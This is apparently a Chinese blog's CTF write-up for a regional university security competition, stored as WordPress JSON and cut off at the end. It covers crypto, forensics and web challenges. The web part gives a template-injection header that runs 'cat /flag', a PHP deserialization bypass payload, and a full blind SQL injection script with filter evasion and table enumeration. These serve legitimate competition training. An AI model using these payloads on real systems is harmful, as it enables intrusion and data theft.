{"id":185,"date":"2025-12-11T11:07:32","date_gmt":"2025-12-11T03:07:32","guid":{"rendered":"http:\/\/blog.which778.cn\/?p=185"},"modified":"2025-12-11T11:07:32","modified_gmt":"2025-12-11T03:07:32","slug":"%e5%85%a8%e5%9b%bd%e5%a4%a7%e5%ad%a6%e7%94%9f%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8%e7%ab%9e%e8%b5%9b%ef%bc%88%e6%96%b0%e7%96%86%e8%b5%9b%e5%8c%ba%ef%bc%89wp","status":"publish","type":"post","link":"http:\/\/blog.which778.cn\/?p=185","title":{"rendered":"\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\uff08\u65b0\u7586\u8d5b\u533a\uff09WP"},"content":{"rendered":"<h1>\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\uff08\u65b0\u7586\u8d5b\u533a\uff09WP<\/h1>\n<h2>CRYPTO<\/h2>\n<h3>affine<\/h3>\n<pre><code>wohz{k533q73q-t76t-9292-351w-h880t22q2q59}\n\na=3 b=7<\/code><\/pre>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251207132703044.png\" alt=\"\" \/><\/p>\n<pre><code>flag{b622d02d-e03e-4545-268f-a771e55d5d64}\n<\/code><\/pre>\n<h3>SomethingHidden<\/h3>\n<pre><code>from Crypto.Util.number import long_to_bytes, isPrime\nfrom hashlib import sha256\nfrom Crypto.Cipher import AES\n\n# --- Challenge Data ---\nN = 29287941964093188883554358759962324766413054938509973020469060324897666596790911417785791718225662909407046748730700393511727164992638859309051914817752161453430071520197806236982668426788996148542614675962835327600646675114044776422291762895540351295488463620830840260895942085590293936010897487443334022180921068879759894357182300863216381540594965567845230665432808496498721899010296008077888600276230436453346416223766922153731558028227295502011211796080344786948543217682991981791223266548648600316048178386585096118093900539239292482498040472725870838971971059537341275594528418355973441717474777281448026845373\ne = 27955266925253148642253678752829183603219107778520606980764762752995571036134821430889656665717477157214005599893648302567419024006700075224145901058864025471376122721606447684082747992022267965241792216735472384680654771240354932987171309705823754809028693606076338867464980753571886581376406114561483162250351593164007074977896197934437555326889625656047853373889179731769563558844917159374790171076366851539889349713510477985229970467404417110370407654250262525961760288684308272656639979945733821040592567089478937570171101226406294152472692793873319781044539193653344814998127081830989348128648490881576398235955\n\noutputs = [\n    (3205220094080592407592828125679505405222175350233807694327159593032969469579539804535020905896745919090265556507179288821213875752712326943938625398874083262608628666420762655582303641231925289465398823744770158764392477253388389480024069287363779774060962366992843006326211329071156343468269190434281421424221587984048575740789112158698868948466566947408953807967713643274889608573354692166180828636721319812054682845978388714126347955276139299995584288733190964976250581524403399583537399029174408442816250678567356095603425069263938872549246059702018186374731429179320660396979172676464090137034199876766815040549, 4831644744350799393765016099396882177026534773569532962146766169148481243322219737516506695852464031849695952207227141415079187438443873384079566512604202776962147357699367571125364213415800582067021480708275284860444744873611933615510520333222572461931300221867821081702084458292525283508482399395833410218592334630954773959254262941692220532586083298023976096784214039362483222310058451221948873959013103817332959309430450412106921677559864731324809944745039703799490755791317245753122131983084501003067118380162680898017587067862940816260310005852375433008408683639088699648954723722337562683163853590166299207882),\n    (10223665720049500731665673770103917961793186693687648371672171897872352435447003168707921372495448171568308786361270844274614650508367480702414916432634701500942569012336282352568912820462024329259048798831366489477953163885962745990200563709834731868518742507641941828621899056783884909373008325439482906379351126150044191130243110199555815953195410189701922253411950464540623741254828469722487917152632951477621077376226540842930933084730079740736321515593713245055389579335748273149419361624409497735156695920380256756873465619561744004161764910755943356577122675253183293946422864924947394830590760908284180805653, 6022461415472339281836498790278755583726889448623920530347868182630937987521253477126939602533575565331657993511358069473757046630594242611137100942575346645763052742511258016344480503774775023629872360358298995380098714687236835234204193892762002768854579522920204073999133902681913826901342657210771151320309334953071731535713048675285675974744410502359479970589333783354881282915026585051250730890093253822846141777793849657061271396501904548945234830806282646236893655892167888170712944257063558285805501798738399575903576977831532203975392444095534068494054836142511588829555267892072625075416002302243176635324),\n    (38295886401800770247937208725926281780443425977810381315056059604563712323892215369756043382931918604092036060639406709054651071621090310774115354952282617734839924719863747396452802997833397137971837803315063878192004294473556651925283669552605730995960381204942868510331336686033996535943375343952758789091959462318596236669589726125157492897857522812637457878020275467551375672236923393880594194964453929585538109959704846836439542984266313034272010738296189222642481431068045312778286597586289119135190665002893852930340193114169492386623439934950489147486565869065688389391266191081890052221792059016651759935, 22997295428814514195091139337373650893365094613018428287375171979263198804955694038921673706847017725112033894298965577877631026760694604442860104769929651081470274609617397037067997884566485822781893833508224191144921037000725886575812219990814743777146135558370440033727198066101727185074410043409716527519221297212798655733539022858296903864363604189024082966485173370094663250147084643430665337682727021661753415715552161602283717204286568751928695603206357216967106479737282869745702423639348584040558580768510604253083698350240121502964676110415110162800693161878015666130229334069872276017309750136299165288207)\n]\n\nENCRYPTED_FLAG = b&#039;|\\x9aN\\x16puZq\\xb8R\\xce\\x84G\\x06\\xb0H\\x91\\xb4,\\xd2\\xba|\\xac\\x91\\xbf&quot;\\xa7C\\n\\x82\\xad\\xa26s- 2\\xc9[\\xd5&gt;\\xa3\\x81&quot;t\\xd2\\x00&quot;&#039;\n\ndef rational_to_contfrac(x, y):\n    &quot;&quot;&quot;Convert a rational number x\/y to its continued fraction representation.&quot;&quot;&quot;\n    quotients = []\n    while y != 0:\n        a = x \/\/ y\n        quotients.append(a)\n        x, y = y, x - a * y\n    return quotients\n\ndef convergents_from_contfrac(frac):\n    &quot;&quot;&quot;Compute convergents from a continued fraction representation.&quot;&quot;&quot;\n    convergents = []\n    n_prev, d_prev = 0, 1\n    n_curr, d_curr = 1, 0\n\n    for quotient in frac:\n        n_next = quotient * n_curr + n_prev\n        d_next = quotient * d_curr + d_prev\n        convergents.append((n_next, d_next))\n        n_prev, d_prev = n_curr, d_curr\n        n_curr, d_curr = n_next, d_next\n\n    return convergents\n\ndef find_secret_and_pads(X_values, convergents):\n    &quot;&quot;&quot;Find the secret S and pads using continued fraction convergents.&quot;&quot;&quot;\n    print(&quot;[*] Checking convergents...&quot;)\n\n    for numerator, denominator in convergents:\n        if not (500 &lt; denominator.bit_length() &lt; 520):\n            continue\n\n        candidate_S = X_values[0] \/\/ numerator\n\n        for delta in range(-2, 3):\n            test_S = candidate_S + delta\n            if not isPrime(test_S):\n                continue\n\n            temp_pads = []\n            valid = True\n\n            for x_val in X_values:\n                pad = x_val % test_S\n                if pad.bit_length() == 511 and isPrime(pad):\n                    temp_pads.append(pad)\n                else:\n                    valid = False\n                    break\n\n            if valid:\n                print(f&quot;[+] Found Secret S: {test_S}&quot;)\n                print(f&quot;[+] Recovered {len(temp_pads)} pads&quot;)\n                return test_S, temp_pads\n\n    return None, []\n\ndef decrypt_flag(pads, encrypted_data):\n    &quot;&quot;&quot;Decrypt the flag using recovered pads.&quot;&quot;&quot;\n    key_str = str(pads)\n    print(f&quot;[*] Key String Length: {len(key_str)} bytes&quot;)\n\n    key_hash = sha256(key_str.encode()).digest()\n    cipher = AES.new(key_hash, AES.MODE_ECB)\n\n    try:\n        decrypted = cipher.decrypt(encrypted_data)\n        return decrypted\n    except Exception as e:\n        print(f&quot;[-] Decryption error: {e}&quot;)\n        return None\n\ndef main():\n    &quot;&quot;&quot;Main function to perform RSA attack and decrypt flag.&quot;&quot;&quot;\n    print(&quot;[*] Starting RSA attack using continued fractions...&quot;)\n\n    X_values = [pow(ac, e, N) for bc, ac in outputs]\n    print(f&quot;[*] Computed {len(X_values)} X values&quot;)\n\n    continued_fraction = rational_to_contfrac(X_values[0], X_values[1])\n    convergents = convergents_from_contfrac(continued_fraction)\n    print(f&quot;[*] Generated {len(convergents)} convergents&quot;)\n\n    secret_S, pads = find_secret_and_pads(X_values, convergents)\n\n    if not pads:\n        print(&quot;[-] Failed to recover pads. Attack unsuccessful.&quot;)\n        return\n\n    flag = decrypt_flag(pads, ENCRYPTED_FLAG)\n\n    if flag:\n        print(f&quot;\\n[+] Flag: {flag.decode(&#039;utf-8&#039;, errors=&#039;ignore&#039;)}&quot;)\n    else:\n        print(&quot;[-] Failed to decrypt flag.&quot;)\n\nif __name__ == &quot;__main__&quot;:\n    main()<\/code><\/pre>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251207160156317.png\" alt=\"\" \/><\/p>\n<pre><code>flag{f3b8d3c0-6f52-4b7d-9b9b-3c91ad7b4c42}<\/code><\/pre>\n<h2>MISC<\/h2>\n<h3>dUmP<\/h3>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/51fa2de2ba96317fa83bb81c5421c8f.png\" alt=\"\" \/><\/p>\n<pre><code>#!\/usr\/bin\/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\nDUMP_FILE = &quot;dUmP.DMP&quot;\n\n# \u9898\u76ee\u4e2d\u5728 dump \u4e2d\u51fa\u73b0\u7684 XOR key\nKEY = b&quot;pyt0n_f0rEnsics_y0u_L1Ke_1t!&quot;\n\n# flag \u56fa\u5b9a\u524d\u7f00\nPLAINTEXT_PREFIX = b&quot;flag{&quot;\n\ndef xor_bytes(data, key):\n    &quot;&quot;&quot;\u4e0e key \u8f6e\u8be2 XOR&quot;&quot;&quot;\n    return bytes([data[i] ^ key[i % len(key)] for i in range(len(data))])\n\ndef main():\n    print(&quot;[+] Loading dump file ...&quot;)\n    with open(DUMP_FILE, &quot;rb&quot;) as f:\n        dump = f.read()\n\n    print(&quot;[+] Searching for XOR\u2011encrypted prefix ...&quot;)\n\n    # \u52a0\u5bc6\u540e flag{ \u7684\u524d 5 \u4e2a\u5b57\u8282\u662f\u4ec0\u4e48\uff1f\n    enc_prefix = bytes([PLAINTEXT_PREFIX[i] ^ KEY[i] for i in range(len(PLAINTEXT_PREFIX))])\n\n    # \u5728\u6574\u4e2a dump \u4e2d\u641c\u7d22\u8fd9\u6bb5 XOR \u52a0\u5bc6\u540e\u7684\u524d\u7f00\n    candidates = []\n    pos = dump.find(enc_prefix)\n    while pos != -1:\n        candidates.append(pos)\n        pos = dump.find(enc_prefix, pos + 1)\n\n    print(f&quot;[+] Found {len(candidates)} possible encrypted blocks&quot;)\n\n    for pos in candidates:\n        # \u4ece\u4f4d\u7f6e pos \u5f00\u59cb\u53d6 200 \u5b57\u8282\uff08\u8db3\u591f\u5305\u542b flag\uff09\n        block = dump[pos:pos+200]\n        dec_block = xor_bytes(block, KEY)\n\n        try:\n            txt = dec_block.decode(&quot;utf-8&quot;)\n        except:\n            continue\n\n        if &quot;flag{&quot; in txt:\n            print(&quot;[+] Possible plaintext fragment found:&quot;)\n            print(txt)\n\n            # \u63d0\u53d6 flag{...}\n            m = re.search(r&quot;flag\\{.*?\\}&quot;, txt)\n            if m:\n                print(&quot;\\n====================&quot;)\n                print(&quot; FLAG FOUND:&quot;)\n                print(&quot; &quot; + m.group(0))\n                print(&quot;====================&quot;)\n                return\n\n    print(&quot;[-] No flag found!&quot;)\n\nif __name__ == &quot;__main__&quot;:\n    main()<\/code><\/pre>\n<pre><code>flag{d1D_y0U_l1KE_tHe_PyTh0n_MEm0rY_f0Rens1Cs}<\/code><\/pre>\n<h3>yijian\u971c\u5bd2\u5341\u56db\u5dde<\/h3>\n<pre><code>! frame contains &quot;404&quot; and http and ! frame contains &quot;HEAD&quot; <\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u7c7b\u4f3c\u51ef\u6492\u5bc6\u7801\u7684\u52a0\u5bc6\u540e\u95e8\u6d41\u91cf<\/p>\n<p><img decoding=\"async\" src=\"E:\\\u7f51\u5b89\\image\\image-20251211093437094.png\" alt=\"image-20251211093437094\" \/><\/p>\n<p>ai\u63d0\u53d6\u811a\u672c\u8fdb\u884c\u89e3\u5bc6<\/p>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251207143849745.png\" alt=\"\" \/><\/p>\n<pre><code>HTTP\/1.1 200 OK\nDate: Mon, 22 Apr 2024 07:18:42 GMT\nServer: Apache\/2.4.7 (Ubuntu)\nX-Powered-By: PHP\/5.5.9-1ubuntu4.14\nVary: Accept-Encoding\nContent-Encoding: gzip\nContent-Length: 175\nConnection: close\nContent-Type: text\/html\n\n[Response] Body (decompressed):\n80324Guvf gevc yrsg fbzr pbagrag gung hfrf gur fnzr rapbqre nf gur Gebwna ubefr,OHQOPLNjRWfb0BMlmGlIra7pDAm9dUp\/33FTqq1DlduIP2DDH8qWaEt7\/jL=\n2166rrq9n\n\/ebbg\n0psrq167p\n5a9ae81\n[Response] Body ROT13:\n80324This trip left some content that uses the same encoder as the Trojan horse,BUDBCYAwEJso0OZyzTyVen7cQNz9qHc\/33SGdd1QyqhVC2QQU8dJnRg7\/wY=\n2166eed9a\n\/root\n0cfed167c\n5n9nr81<\/code><\/pre>\n<pre><code>import base64\nimport zlib\n\nb64 = &#039;BUDBCYAwEJso0OZyzTyVen7cQNz9qHc\/33SGdd1QyqhVC2QQU8dJnRg7\/wY=&#039;\n\ntry:\n    # \u7b2c\u4e00\u6b65\uff1aBase64 \u89e3\u7801\n    decoded = base64.b64decode(b64)\n    print(f&quot;Base64 \u89e3\u7801\u540e\u7684\u5b57\u8282: {decoded}&quot;)\n    print(f&quot;\u957f\u5ea6: {len(decoded)}&quot;)\n\n    # \u7b2c\u4e8c\u6b65\uff1aDEFLATE \u89e3\u538b\n    try:\n        # \u5c1d\u8bd5\u6807\u51c6 zlib \u89e3\u538b\n        decompressed = zlib.decompress(decoded)\n        result = decompressed.decode(&#039;utf-8&#039;, errors=&#039;ignore&#039;)\n        print(f&quot;\\n\u4f7f\u7528 zlib.decompress \u89e3\u538b\u6210\u529f:&quot;)\n        print(f&quot;\u7ed3\u679c: {result}&quot;)\n    except Exception as e1:\n        print(f&quot;\\nzlib.decompress \u5931\u8d25: {e1}&quot;)\n\n        # \u5c1d\u8bd5\u4f7f\u7528 -zlib.MAX_WBITS (raw deflate)\n        try:\n            decompressed = zlib.decompress(decoded, -zlib.MAX_WBITS)\n            result = decompressed.decode(&#039;utf-8&#039;, errors=&#039;ignore&#039;)\n            print(f&quot;\\n\u4f7f\u7528 raw deflate \u89e3\u538b\u6210\u529f:&quot;)\n            print(f&quot;\u7ed3\u679c: {result}&quot;)\n        except Exception as e2:\n            print(f&quot;raw deflate \u4e5f\u5931\u8d25: {e2}&quot;)\n\n            # \u5c1d\u8bd5 gzip\n            try:\n                decompressed = zlib.decompress(decoded, zlib.MAX_WBITS | 16)\n                result = decompressed.decode(&#039;utf-8&#039;, errors=&#039;ignore&#039;)\n                print(f&quot;\\n\u4f7f\u7528 gzip \u89e3\u538b\u6210\u529f:&quot;)\n                print(f&quot;\u7ed3\u679c: {result}&quot;)\n            except Exception as e3:\n                print(f&quot;gzip \u4e5f\u5931\u8d25: {e3}&quot;)\n                print(&quot;\\n\u76f4\u63a5\u8f93\u51fa Base64 \u89e3\u7801\u540e\u7684\u5185\u5bb9:&quot;)\n                print(decoded)\n\nexcept Exception as e:\n    print(f&quot;Base64 \u89e3\u7801\u5931\u8d25: {e}&quot;)\n\n# \u5c1d\u8bd5 Trojan horse \u7f16\u7801\uff08ROT13 \u53d8\u4f53\uff09\nprint(&quot;\\n&quot; + &quot;=&quot;*50)\nprint(&quot;\u5c1d\u8bd5 Trojan horse \u7f16\u7801\u5206\u6790...&quot;)\nprint(&quot;=&quot;*50)\n\n# Trojan horse \u53ef\u80fd\u662f\u4e00\u79cd\u66ff\u6362\u5bc6\u7801\uff0c\u8ba9\u6211\u4eec\u5c1d\u8bd5\u4e0d\u540c\u7684\u89e3\u7801\u65b9\u5f0f\nimport string\n\ndef rot13(text):\n    &quot;&quot;&quot;ROT13 \u7f16\u7801&quot;&quot;&quot;\n    result = []\n    for char in text:\n        if char.isalpha():\n            if char.isupper():\n                result.append(chr((ord(char) - ord(&#039;A&#039;) + 13) % 26 + ord(&#039;A&#039;)))\n            else:\n                result.append(chr((ord(char) - ord(&#039;a&#039;) + 13) % 26 + ord(&#039;a&#039;)))\n        else:\n            result.append(char)\n    return &#039;&#039;.join(result)\n\n# \u5c1d\u8bd5\u5bf9 Base64 \u5b57\u7b26\u4e32\u8fdb\u884c ROT13\nrot13_b64 = rot13(b64)\nprint(f&quot;\\nROT13 \u540e\u7684 Base64: {rot13_b64}&quot;)\n\ntry:\n    decoded_rot13 = base64.b64decode(rot13_b64)\n    print(f&quot;ROT13 \u540e\u89e3\u7801\u6210\u529f: {decoded_rot13}&quot;)\nexcept:\n    print(&quot;ROT13 \u540e\u65e0\u6cd5 Base64 \u89e3\u7801&quot;)\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251207142246890.png\" alt=\"\" \/><\/p>\n<h2>WEB<\/h2>\n<h3>loginsimulator<\/h3>\n<p><strong>\u6a21\u677f\u6ce8\u5165<\/strong><\/p>\n<p><strong><code>\/login<\/code><\/strong> \u5e76\u5e26\u4e0a\u6076\u610f\u7684<code>IP<\/code>\u8bf7\u6c42\u5934<\/p>\n<pre><code>IP: 127.{__import__(&quot;os&quot;).popen(&quot;cat \/flag&quot;).read()}<\/code><\/pre>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251207134736392.png\" alt=\"\" \/><\/p>\n<p>\u83b7\u53d6\u5230\u7684cookie\u52a0\u5230\u8bf7\u6c42\u8bbf\u95ee\/admin<\/p>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251207134723641.png\" alt=\"\" \/><\/p>\n<pre><code>flag{YZLFm1WYDbmXC6dmGiQo4WhBrZ8CfIxK}<\/code><\/pre>\n<h3>tricks_bucket<\/h3>\n<pre><code>\u53cd\u5e8f\u5217\u5316\u7ed5\u8fc7\uff1a\u4f7f\u7528 C-Style \u5e8f\u5217\u5316\u683c\u5f0f\nURL \u8fc7\u6ee4\u7ed5\u8fc7\uff1a\u4f7f\u7528 data:\/\/ \u534f\u8bae\u4f2a\u88c5<\/code><\/pre>\n<pre><code>&lt;?php\nclass tricksbucket{\n    public $wakeup=False;\n    public function __destruct(){\n        if ($this-&gt;wakeup===False) {\n            echo &quot;You are in&quot;;\n            if (isset($_GET[&#039;url&#039;])){\n                $url = $_GET[&#039;url&#039;];\n                if (strpos($url,&quot;flag&quot;)===false || strpos($url,&#039;base64&#039;)!==false || strpos($url,&#039;http&#039;)!==false) {\n                    exit(&quot;no flag , no base , no http&quot;);\n                }\n                $contents = file_get_contents($_GET[&#039;url&#039;]);\n                if (strpos($contents,&quot;flag&quot;)!==false) {\n                    exit(&quot;contents has flag&quot;);\n                }\n                if($contents===&quot;get&quot;){\n                    echo &quot;flag{***}&quot;;    \n                }\n\n            }\n        }else{\n            exit(&quot;No~ you disturb me&quot;);\n        }\n\n    }\n\n    public function __wakeup(){\n        $this-&gt;wakeup=True;\n    }\n}\nif (isset($_GET[&#039;exp&#039;])) {\n    unserialize($_GET[&#039;exp&#039;]);\n}else{\n    highlight_file(&quot;hint.php&quot;);\n}<\/code><\/pre>\n<p>payload<\/p>\n<pre><code>exp\nC:12:&quot;tricksbucket&quot;:0:{}\n\u8fd9\u662f C-Style \u5e8f\u5217\u5316\u683c\u5f0f\uff0c\u4f2a\u88c5\u6210\u5b9e\u73b0\u4e86 Serializable \u63a5\u53e3\n\u53ef\u4ee5\u7ed5\u8fc7 PHP \u7684 __wakeup()__\u672f\u65b9\u6cd5__\nurl\ndata:text\/plain;flag=1,get\n\u4f7f\u7528 data:\/\/ \u534f\u8bae\n\u5728 MIME \u7c7b\u578b\u53c2\u6570\u4e2d\u63d2\u5165 &quot;flag&quot; \u5b57\u7b26\u4e32\u6765\u7ed5\u8fc7 strpos() \u68c0\u67e5\n\u6700\u540e\u7684 &quot;get&quot; \u662f\u5b9e\u9645\u8981\u8bfb\u53d6\u7684\u5185\u5bb9\n?exp=C:12:&quot;tricksbucket&quot;:0:{}&amp;url=data:text\/plain;flag=1,get<\/code><\/pre>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251207142725370.png\" alt=\"\" \/><\/p>\n<h3>Easysql<\/h3>\n<p><strong>\u624b\u6d4b\u9ed1\u540d\u5355<\/strong><\/p>\n<pre><code>hex,ascii,union,substr,group_concat\uff0csubstring,sleep\uff0cbenchmark\uff0cGET_LOCK\uff0cand\uff0cregexp\uff0c\u7b49\u4e8e\u53f7\u3002\u5355\u5f15\u53f7\uff0c\u53cc\u5f15\u53f7\uff0c\u5927\u4e8e\u53f7\uff0c\u5c0f\u4e8e\u53f7\uff0c\u9017\u53f7\u3002\u4e0d\u533a\u5206\u5927\u5c0f\u5199<\/code><\/pre>\n<p><strong>\u4f7f\u7528%26%26\u66ff\u6362and\uff0c\u4f7f\u7528\/<\/strong>\/\u66ff\u6362\u7a7a\u683c\u3002**<\/p>\n<p><strong>\u53d1\u5305\u4e0d\u81ea\u52a8url\u7f16\u7801\uff0c\u6d41\u91cf\u4ee3\u7406\u5230bp<\/strong><\/p>\n<pre><code>import requests\nimport sys\nimport time\nimport os\n\nURL = &quot;http:\/\/web-92ffd6341a.challenge.xctf.org.cn\/feedback\/view&quot;\nPROXIES = {&quot;http&quot;: &quot;http:\/\/127.0.0.1:8080&quot;, &quot;https&quot;: &quot;http:\/\/127.0.0.1:8080&quot;}\nLOG_FILE = os.path.join(os.path.dirname(__file__), &quot;blind_log.txt&quot;)\ndef log(*args):\n    s = &quot; &quot;.join(str(a) for a in args)\n    try:\n        with open(LOG_FILE, &quot;a&quot;, encoding=&quot;utf-8&quot;) as f:\n            f.write(s + &quot;\\n&quot;)\n    except Exception:\n        pass\n    print(s)\ndef send(payload, timeout=8):\n    data = &quot;id=&quot; + payload\n    headers = {&quot;Content-Type&quot;: &quot;application\/x-www-form-urlencoded&quot;}\n    try:\n        r = requests.post(URL, data=data, headers=headers, proxies=PROXIES, timeout=timeout)\n    except Exception:\n   try:\n            r = requests.post(URL, data=data, headers=headers, timeout=timeout)\n        except Exception:\n            return -3\n    t = r.text.lower()\n    if &quot;success&quot; in t:\n        return 1\n    if &quot;fail&quot; in t:\n        return 0\n    if &quot;internal server error&quot; in t:\n        return -1\n    return -2\ndef test(expr):\n    payload = &quot;1%26%26(&quot; + expr + &quot;)&quot;\n    return send(payload)\ndef tohex(s):\n    return &quot;0x&quot; + s.encode(&quot;utf-8&quot;).hex()\nCHARS = &quot;abcdefghijklmnopqrstuvwxyz0123456789{}_:-.\/\\\\@#$%^&amp;*()[]&lt;&gt;|=+!,;`~ABCDEFGHIJKLMNOPQRSTUVWXYZ&quot; \ndef guess_char(get_expr, pos):\n    for ch in CHARS:\n        hx = &quot;0x&quot; + ch.encode(&quot;utf-8&quot;).hex()\n        expr = &quot;MID(&quot; + get_expr + &quot;\/**\/FROM\/**\/&quot; + str(pos) + &quot;\/**\/FOR\/**\/1)\/**\/LIKE\/**\/&quot; + hx\n        r = test(expr)\n        if r == 1:\n            return ch\n        if r == -1:\n      return None\n    return None\ndef extract_string(get_expr, max_len=256):\n    out = []\n    for pos in range(1, max_len + 1):\n        ch = guess_char(get_expr, pos)\n        if not ch:\n            break\n        out.append(ch)\n        if ch == &quot;\\n&quot;:\n            break\n    return &quot;&quot;.join(out)\ndef get_database_name():\n    return extract_string(&quot;database()&quot;)\ndef get_table_name(idx):\n    sub = &quot;(select\/**\/table_name\/**\/from\/**\/information_schema.tables\/**\/where\/**\/table_schema\/**\/LIKE\/**\/database()\/**\/limit\/**\/1\/**\/offset\/**\/&quot; + str(idx) + &quot;)&quot;\n    return extract_string(sub)\ndef list_tables(limit=30):\n    res = []\n    for i in range(limit):\n        name = get_table_name(i)\n        if not name:\n            break\n        res.append(name)\n    return res\ndef get_column_name(table, idx):\n    table_hex = tohex(table)\n    sub = &quot;(select\/**\/column_name\/**\/from\/**\/information_schema.columns\/**\/where\/**\/table_schema\/**\/LIKE\/**\/database()\/**\/%26%26\/**\/table_name\/**\/LIKE\/**\/&quot; + table_hex + &quot;\/**\/limit\/**\/1\/**\/offset\/**\/&quot; + str(idx) + &quot;)&quot;\n    return extract_string(sub)\ndef list_columns(table, limit=30):\n    res = []\n    for i in range(limit):\n        name = get_column_name(table, i)\n        if not name:\n            break\n        res.append(name)\n    return res\ndef extract_cell(table, column, row_index=0, max_len=1024):\n    sub = &quot;(select\/**\/&quot; + column + &quot;\/**\/from\/**\/&quot; + table + &quot;\/**\/limit\/**\/1\/**\/offset\/**\/&quot; + str(row_index) + &quot;)&quot;\n    return extract_string(sub, max_len=max_len)\ndef find_flag_with_tables(tables):\n    for t in tables:\n        cols = list_columns(t, limit=50)\n        target_cols = cols\n        prioritized = [c for c in cols if &quot;flag&quot; in c.lower()]\n        if prioritized:\n            target_cols = prioritized + [c for c in cols if c not in prioritized]\n        for c in target_cols:\n            val = extract_cell(t, c, 0, 2048)\n            if val:\n           if &quot;flag{&quot; in val.lower() or &quot;ctf{&quot; in val.lower() or &quot;xctf{&quot; in val.lower():\n                    return t, c, val\n    return None, None, None\ndef main():\n    log(&quot;start&quot;)\n    try:\n        db = get_database_name()\n    except Exception as e:\n        log(&quot;db_error&quot;, str(e))\n        db = &quot;&quot;\n    log(&quot;mid&quot;)\n    log(&quot;database:&quot;, db)\n    try:\n        tables = list_tables(limit=100)\n    except Exception as e:\n        log(&quot;tables_error&quot;, str(e))\n        tables = []\n    log(&quot;tables:&quot;, tables)\n    target = None\n    for t in tables:\n        if &quot;flag&quot; in t.lower():\n            target = t\n            break\n    if not target and tables:\n        target = tables[0]\n    if target:\n        try:\n            cols = list_columns(target, limit=100)\n        except Exception as e:\n            log(&quot;columns_error&quot;, str(e))\n     cols = []\n        log(&quot;columns:&quot;, {target: cols})\n    t, c, v = find_flag_with_tables(tables if tables else [])\n    if v:\n        log(&quot;FLAG:&quot;, v)\n        return\n    if target and cols:\n        for col in cols:\n            val = extract_cell(target, col, 0, 2048)\n            if val:\n                log(&quot;candidate:&quot;, target, col, val)\n    log(&quot;done&quot;)\nif __name__ == &quot;__main__&quot;:\n    main()<\/code><\/pre>\n<pre><code>POST \/feedback\/view HTTP\/1.1\nHost: web-92ffd6341a.challenge.xctf.org.cn\nUser-Agent: python-requests\/2.28.1\nAccept-Encoding: gzip, deflate, br\nAccept: *\/*\nConnection: keep-alive\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 417\n\nid=1%26%26(CASE\/**\/WHEN\/**\/((LENGTH(BINARY\/**\/MID((select\/**\/flllllllag\/**\/from\/**\/f1111ag\/**\/limit\/**\/1\/**\/offset\/**\/0)\/**\/FROM\/**\/1\/**\/FOR\/**\/38))\/**\/IN\/**\/(38)\/**\/%26%26\/**\/BINARY\/**\/MID((select\/**\/flllllllag\/**\/from\/**\/f1111ag\/**\/limit\/**\/1\/**\/offset\/**\/0)\/**\/FROM\/**\/1\/**\/FOR\/**\/38)\/**\/IN\/**\/(0x666c61677b73475867476d724f6a35534870775170434745704968727338324c6b414962627d)))\/**\/THEN\/**\/1\/**\/ELSE\/**\/(1\/0)\/**\/END)<\/code><\/pre>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251211093829324.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"\/\/images.weserv.nl\/?url=https:\/\/gitee.com\/which777\/images\/raw\/master\/images\/image-20251211093836631.png\" alt=\"\" \/><\/p>\n<button class=\"simplefavorite-button\" data-postid=\"185\" data-siteid=\"1\" data-groupid=\"1\" data-favoritecount=\"0\" style=\"\">\u6536\u85cf <i class=\"sf-icon-star-empty\"><\/i><\/button>","protected":false},"excerpt":{"rendered":"<p>\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\uff08\u65b0\u7586\u8d5b\u533a\uff09WP CRYPTO affine wohz{k533q73q-t76t-9292-351w-h8 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[10,8],"tags":[12,36],"class_list":["post-185","post","type-post","status-publish","format-standard","hentry","category-ctf","category-web","tag-ctf","tag-36"],"_links":{"self":[{"href":"http:\/\/blog.which778.cn\/index.php?rest_route=\/wp\/v2\/posts\/185","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/blog.which778.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/blog.which778.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/blog.which778.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.which778.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=185"}],"version-history":[{"count":1,"href":"http:\/\/blog.which778.cn\/index.php?rest_route=\/wp\/v2\/posts\/185\/revisions"}],"predecessor-version":[{"id":186,"href":"http:\/\/blog.which778.cn\/index.php?rest_route=\/wp\/v2\/posts\/185\/revisions\/186"}],"wp:attachment":[{"href":"http:\/\/blog.which778.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=185"}],"wp